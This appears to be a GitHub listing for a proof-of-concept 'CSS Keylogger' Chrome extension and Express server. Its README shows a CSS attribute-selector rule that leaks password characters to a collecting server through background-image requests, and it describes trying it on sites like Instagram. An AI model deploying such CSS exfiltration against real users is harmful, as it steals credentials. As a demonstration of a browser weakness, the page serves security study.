• Stars
    star
    3,209
  • Rank 13,993 (Top 0.3 %)
  • Language
    CSS
  • Created over 6 years ago
  • Updated over 6 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Chrome extension and Express server that exploits keylogging abilities of CSS.

CSS Keylogger

Chrome extension and Express server that exploits keylogging abilities of CSS.

To use

Setup Chrome extension

  1. Download repository git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu's icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).
  3. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
  4. Click Load unpacked extension… to pop up a file-selection dialog.
  5. Select the css-keylogger-extension in the directory which you downloaded this repository.

Setup Express server

  1. yarn
  2. yarn start

Haxking l33t passw0rds

  1. Open a website that uses a controlled component framework such as React. https://instagram.com.
  2. Press the extension C on the top right of any webpage.
  3. Type your password.
  4. Your password should be captured by the express server.

How it works

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

Using a simple script one can create a css file that will send a custom request for every ASCII character.

More Repositories

1

phelia

⚑ A reactive Slack application framework.
TypeScript
1,910
star
2

quickfix

The best stupid idea for fixing problems in node modules.
JavaScript
268
star
3

redditfs

An interactive command line utility to save files and directories to Reddit.
Go
58
star
4

Unofficial-Google-Messages-Desktop-App

The (Unofficial) Google Messages Desktop Application
Makefile
31
star
5

Remote-Linux-Unlocker

Android application and Linux daemon to login and out of computer remotely.
Java
28
star
6

wssh

Online ssh and sftp interface using docker and websockets.
JavaScript
8
star
7

Finger-Printer

Finger Printer is a library and android application that utilizes mobile devices fingerprint reader to authenticate users on a computer.
Java
5
star
8

genesis

Online IDE for quick prototyping.
JavaScript
3
star
9

Yu-Gi-Oh

School project. Nothing to see here 😊.
C++
3
star
10

face-authenticator

Script that unlocks your desktop with your face.
Python
3
star
11

gugu

Telemetry software for an AVR ATMEGA1284p chip. This software controls the telemetry for a 30ft πŸš€.
C
3
star
12

git-video

A tool for linking Youtube videos in GitHub markdown files with a single link.
Go
2
star
13

mailyourrep-backend

Go
2
star
14

zipcodes2016

Package provides city and state correlating to provided zipcode (last updated 2016).
JavaScript
2
star
15

linux-keylogger

Go
2
star
16

mailyourrep

JavaScript
1
star
17

create-grid

Create a grid from a selected object or group of objects in Figma.
HTML
1
star
18

9ight

πŸŒ’ A Next.js API framework
TypeScript
1
star
19

template-npm

TypeScript
1
star
20

first-robotics-2018

Java
1
star
21

figtree

env files shouldn't exist.
TypeScript
1
star
22

trio-eyes

movin' eyes πŸ‘€
TypeScript
1
star
23

tweet-bot

Go
1
star
24

xray

Go
1
star
25

Bulldog-Bucks

An android application to manage Gonzaga's Bulldog Bucks.
Java
1
star
26

phelia-message-example

TypeScript
1
star
27

gu-port-backend

A backend for https://github.com/Flaque/gu-port
Go
1
star